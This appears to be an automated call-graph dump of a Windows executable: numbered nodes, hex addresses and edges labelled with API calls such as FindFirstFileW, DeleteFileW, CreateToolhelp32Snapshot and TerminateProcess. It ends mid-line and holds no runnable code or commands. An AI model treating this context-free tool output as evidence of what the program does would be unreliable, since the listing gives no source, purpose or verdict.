99010->99011 99682 a85376 60 API calls 99011->99682 99016 afc5a3 99016->98990 99017 a84d37 84 API calls 99016->99017 99018 afc5be 99017->99018 99683 a935b9 59 API calls Mailbox 99018->99683 99020 afc5ce 99021 a8b020 315 API calls 99020->99021 99021->98990 99022->98745 99023->98745 99024->98745 99710 ae4ce2 99025->99710 99027 ae4244 CloseHandle 99027->98745 99028 ae4195 Process32NextW 99028->99027 99030 ae418e Mailbox 99028->99030 99029 a91207 59 API calls 99029->99030 99030->99027 99030->99028 99030->99029 99031 a91a36 59 API calls 99030->99031 99032 aa0119 59 API calls 99030->99032 99033 a917e0 59 API calls 99030->99033 99034 a9151f 61 API calls 99030->99034 99031->99030 99032->99030 99033->99030 99034->99030 99036 a835e2 99035->99036 99037 a835b0 99035->99037 99036->98800 99037->99036 99038 a835d5 IsDialogMessageW 99037->99038 99039 abd273 GetClassLongW 99037->99039 99038->99036 99038->99037 99039->99037 99039->99038 99041 a853b0 316 API calls 99040->99041 99042 a8951f 99041->99042 99043 ac2001 99042->99043 99057 a89527 _memmove 99042->99057 99076 a85190 59 API calls Mailbox 99043->99076 99045 ac22c0 99082 aea48d 89 API calls 4 library calls 99045->99082 99047 ac22de 99047->99047 99048 a89583 99048->98810 99049 a89944 99054 aa0fe6 Mailbox 59 API calls 99049->99054 99050 a8986a 99052 a8987f 99050->99052 99053 ac22b1 99050->99053 99051 aa0fe6 59 API calls Mailbox 99051->99057 99055 aa0fe6 Mailbox 59 API calls 99052->99055 99081 afa983 59 API calls 99053->99081 99065 a896e3 _memmove 99054->99065 99069 a8977d 99055->99069 99057->99045 99057->99048 99057->99049 99057->99051 99058 a89741 99057->99058 99059 a896cf 99057->99059 99058->99050 99062 ac22a0 99058->99062 99058->99069 99070 ac2278 99058->99070 99072 ac2253 99058->99072 99077 a88180 316 API calls 99058->99077 99059->99049 99061 a896dc 99059->99061 99060 aa0fe6 Mailbox 59 API calls 99064 a8970e 99060->99064 99063 aa0fe6 Mailbox 59 API calls 99061->99063 99080 aea48d 89 API calls 4 library calls 99062->99080 99063->99065 99064->99058 99075 a8cca0 316 API calls 99064->99075 99065->99058 99065->99060 99065->99064 99069->98810 99079 aea48d 89 API calls 4 library calls 99070->99079 99078 aea48d 89 API calls 4 library calls 99072->99078 99074->98812 99075->99058 99076->99049 99077->99058 99078->99069 99079->99069 99080->99069 99081->99045 99082->99047 99083->98842 99084->98842 99085->98842 99086->98842 99087->98842 99088->98842 99089->98836 99090->98842 99091->98842 99092->98852 99093->98847 99094->98852 99095->98858 99096->98852 99097->98874 99098->98876 99099->98882 99101 aef898 99100->99101 99102 aef8f2 99100->99102 99103 aa0fe6 Mailbox 59 API calls 99101->99103 99176 aefbb7 59 API calls 99102->99176 99105 aef89f 99103->99105 99106 aef8ab 99105->99106 99163 a93df7 60 API calls Mailbox 99105->99163 99108 a84d37 84 API calls 99106->99108 99113 aef8bd 99108->99113 99109 aef9cb 99156 ae8cd0 99109->99156 99110 aef8ff 99110->99109 99111 aef8d9 99110->99111 99117 aef93f 99110->99117 99111->98885 99164 a93e47 99113->99164 99114 aef9d2 99160 ae394d 99114->99160 99119 a84d37 84 API calls 99117->99119 99118 aef8cd 99118->99111 99175 a93f0b CloseHandle 99118->99175 99125 aef946 99119->99125 99121 aef9c1 99137 ae399c 99121->99137 99123 aef97a 99177 a9162d 99123->99177 99125->99121 99125->99123 99127 a942cf CloseHandle 99129 aefa20 99127->99129 99129->99111 99189 a93f0b CloseHandle 99129->99189 99130 a91c9c 59 API calls 99131 aef994 99130->99131 99182 a91900 99131->99182 99135 ae399c 66 API calls 99136 aef9ae Mailbox 99135->99136 99136->99111 99136->99127 99138 ae39af 99137->99138 99139 ae3a15 99137->99139 99138->99139 99141 ae39b4 99138->99141 99140 ae394d 3 API calls 99139->99140 99155 ae39fd Mailbox 99140->99155 99142 ae3a09 99141->99142 99143 ae39be 99141->99143 99207 ae3a35 62 API calls Mailbox 99142->99207 99145 ae39de 99143->99145 99146 ae39c8 99143->99146 99147 a940cd 59 API calls 99145->99147 99193 a940cd 99146->99193 99149 ae39e6 99147->99149 99206 ae38e0 61 API calls Mailbox 99149->99206 99153 ae39dc 99190 ae397e 99153->99190 99155->99136 99157 ae8cde 99156->99157 99158 ae8cd9 99156->99158 99157->99114 99213 ae7d6e 61 API calls 2 library calls 99158->99213 99214 ae384c 99160->99214 99162 ae3959 WriteFile 99162->99136 99163->99106 99165 a942cf CloseHandle 99164->99165 99166 a93e53 99165->99166 99223 a942f9 99166->99223 99168 a93e72 99174 a93e95 99168->99174 99231 a93c61 62 API calls Mailbox 99168->99231 99170 a93e84 99232 a9389f 99170->99232 99173 ae394d 3 API calls 99173->99174 99174->99110 99174->99118 99175->99111 99176->99110 99178 aa0fe6 Mailbox 59 API calls 99177->99178 99179 a91652 99178->99179 99180 aa0fe6 Mailbox 59 API calls 99179->99180 99181 a91660 99180->99181 99181->99130 99183 acf534 99182->99183 99184 a91914 99182->99184 99186 a91c7e 59 API calls 99183->99186 99246 a918a5 99184->99246 99188 acf53f __wsetenvp _memmove 99186->99188 99187 a9191f 99187->99135 99189->99111 99191 ae394d 3 API calls 99190->99191 99192 ae3990 99191->99192 99192->99155 99194 aa0fe6 Mailbox 59 API calls 99193->99194 99195 a940e0 99194->99195 99208 a91c7e 99195->99208 99198 a9402a WideCharToMultiByte 99199 a9404e 99198->99199 99200 a94085 99198->99200 99201 aa0fe6 Mailbox 59 API calls 99199->99201 99212 a93f20 59 API calls Mailbox 99200->99212 99203 a94055 WideCharToMultiByte 99201->99203 99211 a93f79 59 API calls 2 library calls 99203->99211 99205 a94077 99205->99153 99206->99153 99207->99155 99209 aa0fe6 Mailbox 59 API calls 99208->99209 99210 a91c88 99209->99210 99210->99198 99211->99205 99212->99205 99213->99157 99215 ae385e 99214->99215 99216 ae3853 99214->99216 99215->99162 99221 a942ae SetFilePointerEx 99216->99221 99218 ae38b8 SetFilePointerEx 99222 a942ae SetFilePointerEx 99218->99222 99220 ae38d7 99220->99162 99221->99218 99222->99220 99224 ad06fc 99223->99224 99225 a94312 CreateFileW 99223->99225 99226 a94334 99224->99226 99227 ad0702 CreateFileW 99224->99227 99225->99226 99226->99168 99227->99226 99228 ad0728 99227->99228 99236 a9410a 99228->99236 99231->99170 99233 a938a8 99232->99233 99234 a938b5 99232->99234 99235 a9410a 2 API calls 99233->99235 99234->99173 99234->99174 99235->99234 99243 a94124 99236->99243 99237 ad06cc 99245 a942ae SetFilePointerEx 99237->99245 99238 a941ab SetFilePointerEx 99244 a942ae SetFilePointerEx 99238->99244 99241 a9417f 99241->99226 99242 ad06e6 99243->99237 99243->99238 99243->99241 99244->99241 99245->99242 99247 a918b4 __wsetenvp 99246->99247 99248 a91c7e 59 API calls 99247->99248 99249 a918c5 _memmove 99247->99249 99250 acf4f1 _memmove 99248->99250 99249->99187 99252 a91207 59 API calls 99251->99252 99253 ae4024 99252->99253 99254 a91207 59 API calls 99253->99254 99255 ae402d 99254->99255 99256 a91207 59 API calls 99255->99256 99257 ae4036 99256->99257 99275 aa0284 99257->99275 99262 ae405c 99287 aa0119 99262->99287 99263 a91900 59 API calls 99263->99262 99265 ae4070 FindFirstFileW 99266 ae40fc FindClose 99265->99266 99269 ae408f 99265->99269 99271 ae4107 Mailbox 99266->99271 99267 ae40d7 FindNextFileW 99267->99269 99268 a91c9c 59 API calls 99268->99269 99269->99266 99269->99267 99269->99268 99272 a91900 59 API calls 99269->99272 99338 a917e0 99269->99338 99271->98890 99273 ae40c8 DeleteFileW 99272->99273 99273->99267 99274 ae40f3 FindClose 99273->99274 99274->99271 99347 ab1b70 99275->99347 99278 aa02cd 99362 a919e1 99278->99362 99279 aa02b0 99353 a91821 99279->99353 99282 aa02bc 99349 a9133d 99282->99349 99285 ae4fec GetFileAttributesW 99286 ae404a 99285->99286 99286->99262 99286->99263 99288 a91207 59 API calls 99287->99288 99289 aa012f 99288->99289 99290 a91207 59 API calls 99289->99290 99291 aa0137 99290->99291 99292 a91207 59 API calls 99291->99292 99293 aa013f 99292->99293 99294 a91207 59 API calls 99293->99294 99295 aa0147 99294->99295 99296 ad627d 99295->99296 99297 aa017b 99295->99297 99298 a91c9c 59 API calls 99296->99298 99299 a91462 59 API calls 99297->99299 99300 ad6286 99298->99300 99301 aa0189 99299->99301 99302 a919e1 59 API calls 99300->99302 99303 a91981 59 API calls 99301->99303 99306 aa01be 99302->99306 99304 aa0193 99303->99304 99304->99306 99307 a91462 59 API calls 99304->99307 99305 aa01fe 99371 a91462 99305->99371 99306->99305 99309 aa01dd 99306->99309 99319 ad62a6 99306->99319 99310 aa01b4 99307->99310 99384 a91609 99309->99384 99312 a91981 59 API calls 99310->99312 99311 ad6376 99315 a91821 59 API calls 99311->99315 99312->99306 99314 aa020f 99317 aa0221 99314->99317 99320 a91c9c 59 API calls 99314->99320 99333 ad6333 99315->99333 99318 aa0231 99317->99318 99321 a91c9c 59 API calls 99317->99321 99323 aa0238 99318->99323 99325 a91c9c 59 API calls 99318->99325 99319->99311 99322 ad635f 99319->99322 99331 ad62dd 99319->99331 99320->99317 99321->99318 99322->99311 99327 ad634a 99322->99327 99326 a91c9c 59 API calls 99323->99326 99335 aa023f Mailbox 99323->99335 99324 a91462 59 API calls 99324->99305 99325->99323 99326->99335 99330 a91821 59 API calls 99327->99330 99328 ad633b 99329 a91821 59 API calls 99328->99329 99329->99333 99330->99333 99331->99328 99336 ad6326 99331->99336 99332 a91609 59 API calls 99332->99333 99333->99305 99333->99332 99387 a9153b 59 API calls 2 library calls 99333->99387 99335->99265 99337 a91821 59 API calls 99336->99337 99337->99333 99339 a917f2 99338->99339 99340 acf401 99338->99340 99389 a91680 99339->99389 99395 ad87f9 59 API calls _memmove 99340->99395 99343 a917fe 99343->99269 99344 acf40b 99345 a91c9c 59 API calls 99344->99345 99346 acf413 Mailbox 99345->99346 99348 aa0291 GetFullPathNameW 99347->99348 99348->99278 99348->99279 99350 a9134b 99349->99350 99366 a91981 99350->99366 99352 a9135b 99352->99285 99354 a9189a 99353->99354 99355 a9182d __wsetenvp 99353->99355 99356 a91981 59 API calls 99354->99356 99357 a91868 99355->99357 99358 a91843 99355->99358 99361 a9184b _memmove 99356->99361 99360 a91c7e 59 API calls 99357->99360 99370 a91b7c 59 API calls Mailbox 99358->99370 99360->99361 99361->99282 99363 a919fb 99362->99363 99365 a919ee 99362->99365 99364 aa0fe6 Mailbox 59 API calls 99363->99364 99364->99365 99365->99282 99367 a9198f 99366->99367 99369 a91998 _memmove 99366->99369 99368 a91aa4 59 API calls 99367->99368 99367->99369 99368->99369 99369->99352 99370->99361 99372 a914ce 99371->99372 99373 a91471 99371->99373 99374 a91981 59 API calls 99372->99374 99373->99372 99375 a9147c 99373->99375 99380 a9149f _memmove 99374->99380 99376 acf1de 99375->99376 99377 a91497 99375->99377 99378 a91c7e 59 API calls 99376->99378 99388 a91b7c 59 API calls Mailbox 99377->99388 99381 acf1e8 99378->99381 99380->99314 99382 aa0fe6 Mailbox 59 API calls 99381->99382 99383 acf208 99382->99383 99385 a91aa4 59 API calls 99384->99385 99386 a91614 99385->99386 99386->99305 99386->99324 99387->99333 99388->99380 99390 a91692 99389->99390 99392 a916ba _memmove 99389->99392 99391 aa0fe6 Mailbox 59 API calls 99390->99391 99390->99392 99394 a9176f _memmove 99391->99394 99392->99343 99393 aa0fe6 Mailbox 59 API calls 99393->99394 99394->99393 99395->99344 99397 a84d37 84 API calls 99396->99397 99398 afd203 99397->99398 99417 afd24a Mailbox 99398->99417 99434 afde8e 99398->99434 99400 afd4a2 99401 afd617 99400->99401 99405 afd4b0 99400->99405 99485 afdfb1 92 API calls Mailbox 99401->99485 99404 afd626 99404->99405 99406 afd632 99404->99406 99447 afd057 99405->99447 99406->99417 99407 a84d37 84 API calls 99422 afd29b Mailbox 99407->99422 99412 afd4e9 99462 aa0e38 99412->99462 99415 afd51c 99470 a847be 99415->99470 99416 afd503 99469 aea48d 89 API calls 4 library calls 99416->99469 99417->98895 99420 afd50e GetCurrentProcess TerminateProcess 99420->99415 99422->99400 99422->99407 99422->99417 99467 aefc0d 59 API calls 2 library calls 99422->99467 99468 afd6c8 61 API calls 2 library calls 99422->99468 99426 afd68d 99426->99417 99429 afd6a1 FreeLibrary 99426->99429 99427 afd554 99482 afdd32 107 API calls _free 99427->99482 99429->99417 99433 afd565 99433->99426 99483 a84230 59 API calls Mailbox 99433->99483 99484 a8523c 59 API calls 99433->99484 99486 afdd32 107 API calls _free 99433->99486 99435 a91aa4 59 API calls 99434->99435 99436 afdea9 CharLowerBuffW 99435->99436 99487 adf903 99436->99487 99440 a91207 59 API calls 99441 afdee2 99440->99441 99442 a91462 59 API calls 99441->99442 99444 afdef9 99442->99444 99443 afdf41 Mailbox 99443->99422 99445 a91981 59 API calls 99444->99445 99446 afdf05 Mailbox 99445->99446 99446->99443 99494 afd6c8 61 API calls 2 library calls 99446->99494 99448 afd072 99447->99448 99452 afd0c7 99447->99452 99449 aa0fe6 Mailbox 59 API calls 99448->99449 99450 afd094 99449->99450 99451 aa0fe6 Mailbox 59 API calls 99450->99451 99450->99452 99451->99450 99453 afe139 99452->99453 99454 afe362 Mailbox 99453->99454 99461 afe15c _strcat _wcscpy __wsetenvp 99453->99461 99454->99412 99455 a850d5 59 API calls 99455->99461 99456 a8502b 59 API calls 99456->99461 99457 a85087 59 API calls 99457->99461 99458 a84d37 84 API calls 99458->99461 99459 aa593c 58 API calls __crtLCMapStringA_stat 99459->99461 99461->99454 99461->99455 99461->99456 99461->99457 99461->99458 99461->99459 99502 ae5e42 61 API calls 2 library calls 99461->99502 99463 aa0e4d 99462->99463 99464 aa0ee5 CreateToolhelp32Snapshot 99463->99464 99465 aa0ed3 CloseHandle 99463->99465 99466 aa0eb3 99463->99466 99464->99466 99465->99466 99466->99415 99466->99416 99467->99422 99468->99422 99469->99420 99471 a847c6 99470->99471 99472 aa0fe6 Mailbox 59 API calls 99471->99472 99473 a847d4 99472->99473 99474 a847e0 99473->99474 99503 a846ec 59 API calls Mailbox 99473->99503 99476 a84540 99474->99476 99504 a84650 99476->99504 99478 a8454f 99479 aa0fe6 Mailbox 59 API calls 99478->99479 99480 a845eb 99478->99480 99479->99480 99480->99433 99481 a84230 59 API calls Mailbox 99480->99481 99481->99427 99482->99433 99483->99433 99484->99433 99485->99404 99486->99433 99488 adf92e __wsetenvp 99487->99488 99489 adf963 99488->99489 99492 adfa14 99488->99492 99493 adf96d 99488->99493 99489->99493 99495 a914db 99489->99495 99491 a914db 61 API calls 99491->99492 99492->99491 99492->99493 99493->99440 99493->99446 99494->99443 99496 a914e9 CompareStringW 99495->99496 99501 acf210 99495->99501 99499 a9150c 99496->99499 99498 acf25f 99499->99489 99500 aa4eb8 60 API calls 99500->99501 99501->99498 99501->99500 99502->99461 99503->99474 99505 a84659 Mailbox 99504->99505 99506 abd6ec 99505->99506 99511 a84663 99505->99511 99507 aa0fe6 Mailbox 59 API calls 99506->99507 99509 abd6f8 99507->99509 99508 a8466a 99508->99478 99511->99508 99512 a85190 59 API calls Mailbox 99511->99512 99512->99511 99514 a85041 99513->99514 99515 a8503c 99513->99515 99514->98898 99515->99514 99517 aa37ba 59 API calls 99515->99517 99517->99514 99519 ae4131 99518->99519 99520 ae4965 FindFirstFileW 99518->99520 99519->98766 99520->99519 99521 ae497a FindClose 99520->99521 99521->99519 99523 a9133d 59 API calls 99522->99523 99524 ae3f52 GetFileAttributesW 99523->99524 99525 ae3f7f Mailbox 99524->99525 99526 ae3f66 GetLastError 99524->99526 99525->98937 99527 ae3f73 CreateDirectoryW 99526->99527 99528 ae3f81 99526->99528 99527->99525 99527->99528 99528->99525 99529 a91981 59 API calls 99528->99529 99530 ae3fc3 99529->99530 99531 ae3f1d 59 API calls 99530->99531 99532 ae3fcc 99531->99532 99532->99525 99533 ae3fd0 CreateDirectoryW 99532->99533 99533->99525 99535 a91207 59 API calls 99534->99535 99536 ae3cff 99535->99536 99537 a91207 59 API calls 99536->99537 99538 ae3d07 99537->99538 99539 a91207 59 API calls 99538->99539 99540 ae3d0f 99539->99540 99541 a91207 59 API calls 99540->99541 99542 ae3d17 99541->99542 99543 aa0284 60 API calls 99542->99543 99544 ae3d21 99543->99544 99545 aa0284 60 API calls 99544->99545 99546 ae3d2b 99545->99546 99580 ae4f82 99546->99580 99548 ae3d36 99549 ae4fec GetFileAttributesW 99548->99549 99550 ae3d41 99549->99550 99551 ae3d53 99550->99551 99552 a91900 59 API calls 99550->99552 99553 ae4fec GetFileAttributesW 99551->99553 99552->99551 99554 ae3d5b 99553->99554 99555 ae3d68 99554->99555 99556 a91900 59 API calls 99554->99556 99557 a91207 59 API calls 99555->99557 99556->99555 99558 ae3d70 99557->99558 99559 a91207 59 API calls 99558->99559 99560 ae3d78 99559->99560 99561 aa0119 59 API calls 99560->99561 99562 ae3d89 FindFirstFileW 99561->99562 99563 ae3eb4 FindClose 99562->99563 99574 ae3dac Mailbox 99562->99574 99569 ae3ebe Mailbox 99563->99569 99564 ae3e88 FindNextFileW 99564->99574 99565 a91a36 59 API calls 99565->99574 99567 a91c9c 59 API calls 99567->99574 99568 a917e0 59 API calls 99568->99574 99569->98936 99570 a91900 59 API calls 99570->99574 99571 ae412a 3 API calls 99571->99574 99572 ae3e2a 99576 ae3e4e MoveFileW 99572->99576 99578 ae3e3e DeleteFileW 99572->99578 99645 a9151f 99572->99645 99573 ae3eab FindClose 99573->99569 99574->99563 99574->99564 99574->99565 99574->99567 99574->99568 99574->99570 99574->99571 99574->99572 99574->99573 99577 ae3ef7 CopyFileExW 99574->99577 99579 ae3e6b DeleteFileW 99574->99579 99591 ae4561 99574->99591 99576->99574 99577->99574 99578->99574 99579->99574 99581 a91207 59 API calls 99580->99581 99582 ae4f97 99581->99582 99583 a91207 59 API calls 99582->99583 99584 ae4f9f 99583->99584 99585 aa0119 59 API calls 99584->99585 99586 ae4fae 99585->99586 99587 aa0119 59 API calls 99586->99587 99588 ae4fbe 99587->99588 99589 a9151f 61 API calls 99588->99589 99590 ae4fce Mailbox 99589->99590 99590->99548 99592 ae457d 99591->99592 99593 ae4582 99592->99593 99594 ae4590 99592->99594 99596 a91c9c 59 API calls 99593->99596 99595 a91207 59 API calls 99594->99595 99597 ae4598 99595->99597 99644 ae458b Mailbox 99596->99644 99598 a91207 59 API calls 99597->99598 99599 ae45a0 99598->99599 99600 a91207 59 API calls 99599->99600 99601 ae45ab 99600->99601 99602 a91207 59 API calls 99601->99602 99603 ae45b3 99602->99603 99604 a91207 59 API calls 99603->99604 99605 ae45bb 99604->99605 99606 a91207 59 API calls 99605->99606 99607 ae45c3 99606->99607 99608 a91207 59 API calls 99607->99608 99609 ae45cb 99608->99609 99610 a91207 59 API calls 99609->99610 99611 ae45d3 99610->99611 99612 aa0119 59 API calls 99611->99612 99613 ae45ea 99612->99613 99614 aa0119 59 API calls 99613->99614 99615 ae4603 99614->99615 99616 a91609 59 API calls 99615->99616 99617 ae460f 99616->99617 99618 ae4622 99617->99618 99619 a91981 59 API calls 99617->99619 99620 a91609 59 API calls 99618->99620 99619->99618 99621 ae462b 99620->99621 99622 ae463b 99621->99622 99624 a91981 59 API calls 99621->99624 99623 a91c9c 59 API calls 99622->99623 99625 ae4647 99623->99625 99624->99622 99626 a917e0 59 API calls 99625->99626 99627 ae4653 99626->99627 99648 ae4713 59 API calls 99627->99648 99629 ae4662 99649 ae4713 59 API calls 99629->99649 99631 ae4675 99632 a91609 59 API calls 99631->99632 99633 ae467f 99632->99633 99634 ae4696 99633->99634 99635 ae4684 99633->99635 99637 a91609 59 API calls 99634->99637 99636 a91900 59 API calls 99635->99636 99638 ae4691 99636->99638 99639 ae469f 99637->99639 99642 a917e0 59 API calls 99638->99642 99640 ae46bd 99639->99640 99641 a91900 59 API calls 99639->99641 99643 a917e0 59 API calls 99640->99643 99641->99638 99642->99640 99643->99644 99644->99574 99646 a914db 61 API calls 99645->99646 99647 a91537 99646->99647 99647->99572 99648->99629 99649->99631 99650->98958 99651->98955 99653 afa918 99652->99653 99658 afa970 99652->99658 99654 aa0fe6 Mailbox 59 API calls 99653->99654 99655 afa93a 99654->99655 99656 aa0fe6 Mailbox 59 API calls 99655->99656 99655->99658 99684 ad715b 59 API calls Mailbox 99655->99684 99656->99655 99658->98988 99660 ae78ac 99659->99660 99662 ae78e3 99659->99662 99661 aa0fe6 Mailbox 59 API calls 99660->99661 99660->99662 99661->99662 99663 ad6ebc 99662->99663 99664 ad6f06 99663->99664 99668 ad6f1c Mailbox 99663->99668 99667 a91a36 59 API calls 99664->99667 99665 ad6f5a 99670 a8a820 316 API calls 99665->99670 99666 ad6f47 99669 afc355 316 API calls 99666->99669 99667->99668 99668->99665 99668->99666 99675 ad6f53 99669->99675 99673 ad6f91 99670->99673 99672 ad7002 99672->98990 99674 ad6fdc 99673->99674 99673->99675 99677 ad6fc1 99673->99677 99674->99675 99690 aea48d 89 API calls 4 library calls 99674->99690 99691 ad6cf1 59 API calls Mailbox 99675->99691 99685 ad706d 99677->99685 99679->98990 99680->98998 99681->99004 99682->99016 99683->99020 99684->99655 99686 ad7085 99685->99686 99692 aff1b2 99686->99692 99697 af495b 99686->99697 99687 ad70d9 99687->99675 99690->99675 99691->99672 99693 a84d37 84 API calls 99692->99693 99694 aff1cf 99693->99694 99695 ae4148 66 API calls 99694->99695 99696 aff1de 99695->99696 99696->99687 99698 aa0fe6 Mailbox 59 API calls 99697->99698 99699 af496c 99698->99699 99706 a9433f 99699->99706 99702 a84d37 84 API calls 99703 af498d GetEnvironmentVariableW 99702->99703 99709 ae7a51 59 API calls Mailbox 99703->99709 99705 af49aa 99705->99687 99707 aa0fe6 Mailbox 59 API calls 99706->99707 99708 a94351 99707->99708 99708->99702 99709->99705 99711 ae4d09 99710->99711 99715 ae4cf0 99710->99715 99717 aa37c3 59 API calls __wcstoi64 99711->99717 99714 ae4d0f 99714->99030 99715->99711 99715->99714 99716 aa385c GetStringTypeW _iswctype 99715->99716 99716->99715 99717->99714 99718 aa7e83 99719 aa7e8f __read 99718->99719 99755 aaa038 GetStartupInfoW 99719->99755 99722 aa7e94 99757 aa8dac GetProcessHeap 99722->99757 99723 aa7eec 99724 aa7ef7 99723->99724 99840 aa7fd3 58 API calls 3 library calls 99723->99840 99758 aa9d16 99724->99758 99727 aa7efd 99728 aa7f08 __RTC_Initialize 99727->99728 99841 aa7fd3 58 API calls 3 library calls 99727->99841 99779 aad802 99728->99779 99731 aa7f17 99732 aa7f23 GetCommandLineW 99731->99732 99842 aa7fd3 58 API calls 3 library calls 99731->99842 99798 ab5153 GetEnvironmentStringsW 99732->99798 99736 aa7f22 99736->99732 99738 aa7f3d 99739 aa7f48 99738->99739 99843 aa32e5 58 API calls 3 library calls 99738->99843 99808 ab4f88 99739->99808 99742 aa7f4e 99743 aa7f59 99742->99743 99844 aa32e5 58 API calls 3 library calls 99742->99844 99822 aa331f 99743->99822 99746 aa7f61 99747 aa7f6c __wwincmdln 99746->99747 99845 aa32e5 58 API calls 3 library calls 99746->99845 99828 a95f8b 99747->99828 99750 aa7f80 99751 aa7f8f 99750->99751 99846 aa3588 58 API calls _doexit 99750->99846 99847 aa3310 58 API calls _doexit 99751->99847 99754 aa7f94 __read 99756 aaa04e 99755->99756 99756->99722 99757->99723 99848 aa33b7 36 API calls 2 library calls 99758->99848 99760 aa9d1b 99849 aa9f6c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 99760->99849 99762 aa9d20 99763 aa9d24 99762->99763 99851 aa9fba TlsAlloc 99762->99851 99850 aa9d8c 61 API calls 2 library calls 99763->99850 99766 aa9d29 99766->99727 99767 aa9d36 99767->99763 99768 aa9d41 99767->99768 99852 aa8a05 99768->99852 99771 aa9d83 99860 aa9d8c 61 API calls 2 library calls 99771->99860 99774 aa9d88 99774->99727 99775 aa9d62 99775->99771 99776 aa9d68 99775->99776 99859 aa9c63 58 API calls 4 library calls 99776->99859 99778 aa9d70 GetCurrentThreadId 99778->99727 99780 aad80e __read 99779->99780 99781 aa9e3b __lock 58 API calls 99780->99781 99782 aad815 99781->99782 99783 aa8a05 __calloc_crt 58 API calls 99782->99783 99784 aad826 99783->99784 99785 aad891 GetStartupInfoW 99784->99785 99786 aad831 @_EH4_CallFilterFunc@8 __read 99784->99786 99792 aad8a6 99785->99792 99795 aad9d5 99785->99795 99786->99731 99787 aada9d 99874 aadaad LeaveCriticalSection _doexit 99787->99874 99789 aa8a05 __calloc_crt 58 API calls 99789->99792 99790 aada22 GetStdHandle 99790->99795 99791 aada35 GetFileType 99791->99795 99792->99789 99794 aad8f4 99792->99794 99792->99795 99793 aad928 GetFileType 99793->99794 99794->99793 99794->99795 99872 aaa05b InitializeCriticalSectionAndSpinCount 99794->99872 99795->99787 99795->99790 99795->99791 99873 aaa05b InitializeCriticalSectionAndSpinCount 99795->99873 99799 aa7f33 99798->99799 99800 ab5164 99798->99800 99804 ab4d4b GetModuleFileNameW 99799->99804 99875 aa8a4d 58 API calls 2 library calls 99800->99875 99802 ab51a0 FreeEnvironmentStringsW 99802->99799 99803 ab518a _memmove 99803->99802 99805 ab4d7f _wparse_cmdline 99804->99805 99807 ab4dbf _wparse_cmdline 99805->99807 99876 aa8a4d 58 API calls 2 library calls 99805->99876 99807->99738 99809 ab4fa1 __wsetenvp 99808->99809 99813 ab4f99 99808->99813 99810 aa8a05 __calloc_crt 58 API calls 99809->99810 99818 ab4fca __wsetenvp 99810->99818 99811 ab5021 99812 aa2f85 _free 58 API calls 99811->99812 99812->99813 99813->99742 99814 aa8a05 __calloc_crt 58 API calls 99814->99818 99815 ab5046 99816 aa2f85 _free 58 API calls 99815->99816 99816->99813 99818->99811 99818->99813 99818->99814 99818->99815 99819 ab505d 99818->99819 99877 ab4837 58 API calls __wtof_l 99818->99877 99878 aa8ff6 IsProcessorFeaturePresent 99819->99878 99821 ab5069 99821->99742 99824 aa332b __IsNonwritableInCurrentImage 99822->99824 99901 aaa701 99824->99901 99825 aa3349 __initterm_e 99826 aa2f70 __cinit 67 API calls 99825->99826 99827 aa3368 _doexit __IsNonwritableInCurrentImage 99825->99827 99826->99827 99827->99746 99829 a95fa5 99828->99829 99839 a96044 99828->99839 99830 a95fdf IsThemeActive 99829->99830 99904 aa359c 99830->99904 99834 a9600b 99916 a95f00 SystemParametersInfoW SystemParametersInfoW 99834->99916 99836 a96017 99917 a95240 99836->99917 99838 a9601f SystemParametersInfoW 99838->99839 99839->99750 99840->99724 99841->99728 99842->99736 99846->99751 99847->99754 99848->99760 99849->99762 99850->99766 99851->99767 99853 aa8a0c 99852->99853 99855 aa8a47 99853->99855 99857 aa8a2a 99853->99857 99861 ab5426 99853->99861 99855->99771 99858 aaa016 TlsSetValue 99855->99858 99857->99853 99857->99855 99869 aaa362 Sleep 99857->99869 99858->99775 99859->99778 99860->99774 99862 ab5431 99861->99862 99867 ab544c 99861->99867 99863 ab543d 99862->99863 99862->99867 99870 aa8d58 58 API calls __getptd_noexit 99863->99870 99865 ab545c RtlAllocateHeap 99866 ab5442 99865->99866 99865->99867 99866->99853 99867->99865 99867->99866 99871 aa35d1 DecodePointer 99867->99871 99869->99857 99870->99866 99871->99867 99872->99794 99873->99795 99874->99786 99875->99803 99876->99807 99877->99818 99879 aa9001 99878->99879 99884 aa8e89 99879->99884 99883 aa901c 99883->99821 99885 aa8ea3 _memset __call_reportfault 99884->99885 99886 aa8ec3 IsDebuggerPresent 99885->99886 99892 aaa385 SetUnhandledExceptionFilter UnhandledExceptionFilter 99886->99892 99889 aa8faa 99891 aaa370 GetCurrentProcess TerminateProcess 99889->99891 99890 aa8f87 __call_reportfault 99893 aac826 99890->99893 99891->99883 99892->99890 99894 aac82e 99893->99894 99895 aac830 IsProcessorFeaturePresent 99893->99895 99894->99889 99897 ab5b3a 99895->99897 99900 ab5ae9 5 API calls 2 library calls 99897->99900 99899 ab5c1d 99899->99889 99900->99899 99902 aaa704 EncodePointer 99901->99902 99902->99902 99903 aaa71e 99902->99903 99903->99825 99905 aa9e3b __lock 58 API calls 99904->99905 99906 aa35a7 DecodePointer EncodePointer 99905->99906 99969 aa9fa5 LeaveCriticalSection 99906->99969 99908 a96004 99909 aa3604 99908->99909 99910 aa3628 99909->99910 99911 aa360e 99909->99911 99910->99834 99911->99910 99970 aa8d58 58 API calls __getptd_noexit 99911->99970 99913 aa3618 99971 aa8fe6 9 API calls __wtof_l 99913->99971 99915 aa3623 99915->99834 99916->99836 99918 a9524d __write_nolock 99917->99918 99919 a91207 59 API calls 99918->99919 99920 a95258 GetCurrentDirectoryW 99919->99920 99972 a94ec8 99920->99972 99922 a9527e IsDebuggerPresent 99923 a9528c 99922->99923 99924 ad0b21 MessageBoxA 99922->99924 99925 ad0b39 99923->99925 99926 a952a0 99923->99926 99924->99925 100095 a9314d 59 API calls Mailbox 99925->100095 100040 a931bf 99926->100040 99934 ad0b49 99937 ad0b5f SetCurrentDirectoryW 99934->99937 99936 a9536c Mailbox 99936->99838 99937->99936 99969->99908 99970->99913 99971->99915 99973 a91207 59 API calls 99972->99973 99974 a94ede 99973->99974 100104 a95420 99974->100104 99976 a94efc 99977 a919e1 59 API calls 99976->99977 99978 a94f10 99977->99978 99979 a91c9c 59 API calls 99978->99979 99980 a94f1b 99979->99980 100118 a8477a 99980->100118 99983 a91a36 59 API calls 99984 a94f34 99983->99984 99985 a839be 68 API calls 99984->99985 99986 a94f44 Mailbox 99985->99986 99987 a91a36 59 API calls 99986->99987 99988 a94f68 99987->99988 99989 a839be 68 API calls 99988->99989 99990 a94f77 Mailbox 99989->99990 99991 a91207 59 API calls 99990->99991 99992 a94f94 99991->99992 100121 a955bc 99992->100121 99996 a94fae 